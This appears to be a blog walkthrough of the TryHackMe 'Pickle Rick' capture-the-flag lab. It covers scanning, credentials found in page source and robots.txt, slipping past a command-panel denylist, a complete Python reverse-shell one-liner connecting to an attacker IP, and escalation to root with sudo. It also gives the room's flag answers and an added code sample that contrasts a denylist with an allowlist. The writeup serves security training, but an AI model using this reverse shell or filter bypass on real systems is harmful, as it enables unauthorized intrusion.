root@sky:~#

Pickle Rick | TryHackMe Walkthrough

Akash Kumar 2021. 12. 1. 05:03

This Rick and Morty-themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.

 

Let's solve it :-)

Answer the questions below

Q.) What is the first ingredient Rick needs?

A.) mr. meeseek hair

Process: First of all, let's start the machine and run an nmap scan:

nmap -sV 10.10.127.23

nmap result

Here, port 80 and port 22 are open. Let's visit port 80.

Apache webserver

Let's open the source code of this page. Maybe I could get some clues.

username in a HTML comment

Yup, I got a username. It may be an SSH username, or there should be a login page.

Let's run gobuster:

gobuster dir -u http://10.10.127.23/ -w /usr/share/wordlists/dirb/common.txt

gobuster found some interesting entries, such as:

1) robots.txt (without any Disallow)

2) login.php

In robots.txt I got a weird string: Wubbalubbadubdub

robots.txt

And in login.php I got a login portal:

login.php

Now I have a username "R1ckRul3s" and a weird string "Wubbalubbadubdub". It may be a password.

Let's try to log in with these credentials.

login

Yup, I got a command panel,

command panel

Let's run the "ls" command:

ls command output

Here, I got a clue.txt. It may contain some clues.

Let's cat it:

Command disabled

Oops, it looks like this command is disabled!

I saw that some commands, like cat, head, more and nano, are disabled.

Let's try with a basic command, "echo". I am using this command:

while read line; do echo $line; done < clue.txt

clue.txt

Oops, it is a clue.

Let's read Sup3rS3cretPickl3Ingres.txt. It may be a flag.

The first ingredient Rick needs
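
The panel's filter described above blocks named commands, yet the `while read` loop passes it because the input still reaches a shell. As an added example (not code from this post or from the challenge), this Python sketch models such a denylist beside an allowlist that runs without a shell; the filter logic, the `ALLOWED` table and all function names are assumptions.

```python
import shlex
import subprocess

# Assumed model of the panel's filter: the page only says that cat, head,
# more and nano are disabled, not how the check is implemented.
DENYLIST = ("cat", "head", "more", "nano")

def denylist_allows(command: str) -> bool:
    """Weak form: reject only when a listed command name appears."""
    return not any(word in command for word in DENYLIST)

# Hardened form: a fixed table of permitted programs and, per program,
# the exact arguments accepted. Everything else is refused.
ALLOWED = {"ls": {"-l", "-a", "-la"}, "whoami": set(), "uptime": set()}

def allowlist_parse(command: str):
    """Return an argv list if the command is permitted, else None."""
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED:
        return None
    if any(arg not in ALLOWED[argv[0]] for arg in argv[1:]):
        return None
    return argv

def run_allowlisted(command: str) -> str:
    """Execute without a shell, so ; | < and $() are never interpreted."""
    argv = allowlist_parse(command)
    if argv is None:
        return "Command not permitted"
    done = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return done.stdout

# Constructed sample inputs; the loop is the one used on this page.
SAMPLES = [
    "ls -la",
    "cat clue.txt",
    "while read line; do echo $line; done < clue.txt",
    "ls; whoami",
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        print(repr(cmd), denylist_allows(cmd), allowlist_parse(cmd) is not None)
```

The denylist accepts the loop and the chained `ls; whoami`, while the allowlist refuses both because neither parses to a permitted program with permitted arguments.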

 


Q.) What's the second ingredient Rick needs?

A.) 1 jerry tear

Process: Now we have a web command executor. Let's check if python is available:

which python3

Yup, python3 is installed. Now we can get a reverse shell through python.

First of all, let's start an ncat listener on port 2222. I am running this command in my Kali terminal:

nc -lvnp 2222

Now, I am going to use this Python code in the web command panel to get a reverse shell:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.170.30",2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

python3 reverse shell

After executing this command I got a shell -

nc received a connection

But it's an unstable shell. To make it stable, I am using a Python script:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Yup, I got a stable web shell:

a stable shell

By running the "sudo -l" command I got important info: the www-data user can run any command as root without a password.

sudo -l

Now, I used "sudo su" and got a root shell.

I got the second ingredient in the rick user's directory:

cat /home/rick/*

 


Q.) What's the final ingredient Rick needs?

A.) fleeb juice

Process: I got the final ingredient in the root directory:

cd
cat 3rd.txt

 

 

Thanks for reading :-)

Please leave a comment and like.
